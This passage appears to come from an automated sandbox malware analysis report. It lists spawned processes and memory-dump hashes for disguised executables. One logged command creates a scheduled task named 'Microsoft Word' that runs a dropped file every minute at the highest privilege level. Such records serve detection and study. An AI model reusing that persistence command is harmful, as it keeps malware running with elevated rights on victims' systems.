                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:86
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:87
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:99
                            Start time:09:50:59
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:104
                            Start time:09:51:01
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:109
                            Start time:09:51:02
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:150
                            Start time:09:51:15
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:171
                            Start time:09:51:21
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:214
                            Start time:09:51:33
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:224
                            Start time:09:51:36
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:328
                            Start time:09:52:04
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:333
                            Start time:09:52:05
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:363
                            Start time:09:52:15
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:368
                            Start time:09:52:17
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:393
                            Start time:09:52:24
                            Start date:03/07/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                              Execution Graph

                              Execution Coverage:16.9%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:100%
                              Total number of Nodes:3
                              Total number of Limit Nodes:0
                              execution_graph 10908 7fff60f60f3f 10909 7fff60f60f91 NtProtectVirtualMemory 10908->10909 10911 7fff60f61015 10909->10911

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f5a000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: ef2b47755fcd1ab3a7dc3526f555041f3c76300eebb8f040735534b114ff1cdb
                              • Instruction ID: 8d06e0755ef5e2c84e4615d1837278c90fa8b77564a554d3dd460f696ddef96f
                              • Opcode Fuzzy Hash: ef2b47755fcd1ab3a7dc3526f555041f3c76300eebb8f040735534b114ff1cdb
                              • Instruction Fuzzy Hash: FC31A331A1CB584FDB18DB5CA8066EE77E1EB99321F00466FE049D3246CF75A8458BC1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2659 7fff60f57717-7fff60f57751 2662 7fff60f57753-7fff60f5775d 2659->2662 2663 7fff60f577bf 2659->2663 2662->2663 2665 7fff60f5775f-7fff60f5776c 2662->2665 2664 7fff60f577c1-7fff60f577ea 2663->2664 2671 7fff60f57854 2664->2671 2672 7fff60f577ec-7fff60f577f7 2664->2672 2666 7fff60f577a5-7fff60f577bd 2665->2666 2667 7fff60f5776e-7fff60f57780 2665->2667 2666->2664 2669 7fff60f57784-7fff60f57797 2667->2669 2670 7fff60f57782 2667->2670 2669->2669 2673 7fff60f57799-7fff60f577a1 2669->2673 2670->2669 2675 7fff60f57856-7fff60f578c7 2671->2675 2672->2671 2674 7fff60f577f9-7fff60f57807 2672->2674 2673->2666 2676 7fff60f57840-7fff60f57852 2674->2676 2677 7fff60f57809-7fff60f5781b 2674->2677 2683 7fff60f578cd-7fff60f578dc 2675->2683 2676->2675 2678 7fff60f5781f-7fff60f57832 2677->2678 2679 7fff60f5781d 2677->2679 2678->2678 2681 7fff60f57834-7fff60f5783c 2678->2681 2679->2678 2681->2676 2684 7fff60f578e4-7fff60f578f6 2683->2684 2685 7fff60f578de 2683->2685 2685->2684
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7f9d29d7e6de84839c77b7bd5f9c04ed0cb4545b1c72a37e2b5506d15c533176
                              • Instruction ID: efa9e3a15c58e1d93cd36a8e5f7482729109b09bb6b51ea8f2f0bbff474090bd
                              • Opcode Fuzzy Hash: 7f9d29d7e6de84839c77b7bd5f9c04ed0cb4545b1c72a37e2b5506d15c533176
                              • Instruction Fuzzy Hash: 6751B071C2C4668AF77A166CF4824F9A7C1EF69360FA50078DCAD837C7AC1C6CA641C2
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6c1bb78e959abffe641219ef5589b1e0b02d387abb75f140487e42de425ea8c6
                              • Instruction ID: 545bf98803a3835e193c2cc1833bd17c3939f84432410cd4566acad5b20edba9
                              • Opcode Fuzzy Hash: 6c1bb78e959abffe641219ef5589b1e0b02d387abb75f140487e42de425ea8c6
                              • Instruction Fuzzy Hash: C251E321A2E6978FF712A77898951B53BD0DF6A310F2801B6E449C72D3ED4D68478392
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3cf7ccc792fbffb60feffe10b11dc4c273793d3ae4954f8115219be507909e29
                              • Instruction ID: 687176beb1f29170fbf537c0c1dcfd06c1354e2790c1ba7910ad032ee0fe3ac6
                              • Opcode Fuzzy Hash: 3cf7ccc792fbffb60feffe10b11dc4c273793d3ae4954f8115219be507909e29
                              • Instruction Fuzzy Hash: E4514D71918A1C8FDB98DF58D845BE9BBF1FB59310F1082AAD00DE3252DF34A9858F81
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ad265d676c48f9cc9ec2f13a2d8d19417c2492073580f85c2b444ab768003633
                              • Instruction ID: af40b192173842b19995afe96ccd4ecf5fc738253c73f4e1fdb69f9fc15913c2
                              • Opcode Fuzzy Hash: ad265d676c48f9cc9ec2f13a2d8d19417c2492073580f85c2b444ab768003633
                              • Instruction Fuzzy Hash: 36516030918A4E8FEBA9DF28D8457A977D1FF68300F14822EE85DC3395DF3499458B82
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf304a86725646ad73abc9955c6e2a8dfa6a61c09a4f9d03547d54eca95039ab
                              • Instruction ID: aabbf236ed3d60b017c8ddb95d6ad33511ad90ba2bd5460f900fd03c2cdd0649
                              • Opcode Fuzzy Hash: bf304a86725646ad73abc9955c6e2a8dfa6a61c09a4f9d03547d54eca95039ab
                              • Instruction Fuzzy Hash: 6E518C1199E2C24FE79B862458556B13FE4DF67215F2E01FBD489C72E3E90C180E8392
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 39112c65959eeaf7ae5b5ddd0af79fdf87737ef1b9cb838c98f8cd9aa51f4eca
                              • Instruction ID: 68a230cbb25d63b660601a84b5df080b11b5b59b8536b5900f29f6151eebe2a8
                              • Opcode Fuzzy Hash: 39112c65959eeaf7ae5b5ddd0af79fdf87737ef1b9cb838c98f8cd9aa51f4eca
                              • Instruction Fuzzy Hash: 3E51A130608A4A8FEB69DF28E8453E977D1FF58301F14826ED84DC7395DF3899458B82
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9b85208680c1f3359e80b7bf180bde1cafb95c92276460b6c855688df55d8b77
                              • Instruction ID: 465a9512b5bba8d0204799ab6620c9cc9d6d7be0e2f5703bd90de699ef99553a
                              • Opcode Fuzzy Hash: 9b85208680c1f3359e80b7bf180bde1cafb95c92276460b6c855688df55d8b77
                              • Instruction Fuzzy Hash: 96513E71918A1C8FDBA8DF58D845BE9BBF1FB58310F1082AAD40DE3251DF34A9858F81
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: df884faa4c61d1992206d95b78e3ad11aa76a553241bc021e37a7f7aab906fd7
                              • Instruction ID: cec36472dad5ca193fc6c8829b1d2728ce554e919a1bb0757b6f3f7b1d15f4e4
                              • Opcode Fuzzy Hash: df884faa4c61d1992206d95b78e3ad11aa76a553241bc021e37a7f7aab906fd7
                              • Instruction Fuzzy Hash: D251E03190D6898FD757E76888556E57FE0EF5B220B1901FAD088CB1A3EE2C581BC361
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 144c552b9a6704400bfe174e8635ab99fc0d1541dfb0f88b5af4580f3f9c1817
                              • Instruction ID: 36e7640ee941b8f68969de2337fa58c1ea46e625ce3637a3d397e4ef6cf86950
                              • Opcode Fuzzy Hash: 144c552b9a6704400bfe174e8635ab99fc0d1541dfb0f88b5af4580f3f9c1817
                              • Instruction Fuzzy Hash: 47513121F1C51B8BFB5ABA6C84966BD36C2EFA4315FA40435E00DC33C6EE2CB9064746
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f2a0c9be67d253b8528882b78630191a8d3f7f3ab093ff409de275ead1467c5b
                              • Instruction ID: d28a66029d0d2fafb13ea270ebda0362fa2d941074559946e29ed4e4de0a97d4
                              • Opcode Fuzzy Hash: f2a0c9be67d253b8528882b78630191a8d3f7f3ab093ff409de275ead1467c5b
                              • Instruction Fuzzy Hash: 9F515D36F0C54786FBA6AA68C4811BD27C2EFB6324F250639D54DC73C2DD2EAC564282
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9434f8a429b78984f7c8b5336b94002e598b62bfb22e85ee882b8dc35ed3ea72
                              • Instruction ID: ceb53c747dc5f958409cc78f6fe8e7faf7e4fa66d6be2d5dd61a117ca3239d87
                              • Opcode Fuzzy Hash: 9434f8a429b78984f7c8b5336b94002e598b62bfb22e85ee882b8dc35ed3ea72
                              • Instruction Fuzzy Hash: 4F419421C2C5968AF379466CF4C24F9B3C1EB65720F64107DDCA982BC7BC1C68AA41C7
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f1dd673de9c7e7eff0c0efdc2c869b2d69f74fec9563f78c4e7abd43b52aa445
                              • Instruction ID: e3e208514d67549edde94596f1bdc479972d3a9d7fe802268b3623753b98323b
                              • Opcode Fuzzy Hash: f1dd673de9c7e7eff0c0efdc2c869b2d69f74fec9563f78c4e7abd43b52aa445
                              • Instruction Fuzzy Hash: 01412B71E1C90ACEEBA6E72894552BC77E1EF68301F640579D40FE3792EE2968058BC1
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c62230c46cae2992462373cd84406fcc0be7a96fc702dca6603a866406034d23
                              • Instruction ID: e567cacd51f78d4b0108f15ed85e7cbcc01bf7995dd9c7a6a65f0464b60e8006
                              • Opcode Fuzzy Hash: c62230c46cae2992462373cd84406fcc0be7a96fc702dca6603a866406034d23
                              • Instruction Fuzzy Hash: 2941BF04F2C52B8AF68977B811661BE0AE39F94306FE14834E10DD7BCFED6DE9060295
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e25a367e11a5892f1b49f509a775630146b49b654f1768fe253ae5f6241ea9bd
                              • Instruction ID: d2c3bc2525c0182ab684c6a869be0107ae39c8921c7fa12d7d8a50edca7622ae
                              • Opcode Fuzzy Hash: e25a367e11a5892f1b49f509a775630146b49b654f1768fe253ae5f6241ea9bd
                              • Instruction Fuzzy Hash: 4741FB21F2891B8BEB95BB2C80955B936D3EBE8315BA50475E00DC33D6EE3CE8424744
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f3c83535711b11bcf4fb3b5dfb5d09059216e5f2413fd991612c30a1cf9c97a5
                              • Instruction ID: cc6ae6d5abd43406371c15f0cfaa228ce587fa07c0ac74fc87f4b991cbb25a12
                              • Opcode Fuzzy Hash: f3c83535711b11bcf4fb3b5dfb5d09059216e5f2413fd991612c30a1cf9c97a5
                              • Instruction Fuzzy Hash: 75417F30A18D1A8FEB96EB6C84556BCB7E1FFA8311B640079D40DD7396EE29AC428740
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 75bad7563a693c80ed175f3d32db86bda8d4237780a893f834ea1ea3a32a6100
                              • Instruction ID: eb1b1a4b7a43172e1fdb141ab139db76f076af1797bf1ebbd56007ecfbf2e921
                              • Opcode Fuzzy Hash: 75bad7563a693c80ed175f3d32db86bda8d4237780a893f834ea1ea3a32a6100
                              • Instruction Fuzzy Hash: 81412A31A1891A8FEB95EB6CD8556BC77E1FFA8311F640479D50DD33D2EE2868418740
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 053181efe830e6a6d17a1789d6d946387833c505e5420da1fe4665cdac927f2f
                              • Instruction ID: 135172927d252611334c1a25d5f31b9a97589aec75d188820af3b9d4323d8989
                              • Opcode Fuzzy Hash: 053181efe830e6a6d17a1789d6d946387833c505e5420da1fe4665cdac927f2f
                              • Instruction Fuzzy Hash: 8931F622D4C5839FEB27A278881B4B93BD0DF76210F2905B5D489C72D3ED1C686B42A3
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c1b5a8ebd48c4afd6e2491b8f61f93c5acd81d4a95a14e00aae7ca1624ba2bac
                              • Instruction ID: 9c1a5ef56311fdb6e530ca531c87a1294d2cf3110bf475d640a79f8a5d31c654
                              • Opcode Fuzzy Hash: c1b5a8ebd48c4afd6e2491b8f61f93c5acd81d4a95a14e00aae7ca1624ba2bac
                              • Instruction Fuzzy Hash: F0311931A08A1C8FDF94EB68D885BEDB7F1FB68315F10416AD40ED3252DF34A9868B41
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 05eb31c2339cef9390c424b7d26d242664d85b2801846083f3cd67ea8257fa3d
                              • Instruction ID: 4a3176911baa5c30f36f9c85a184f0a24d19f045a92824efa24c639adcc8d29b
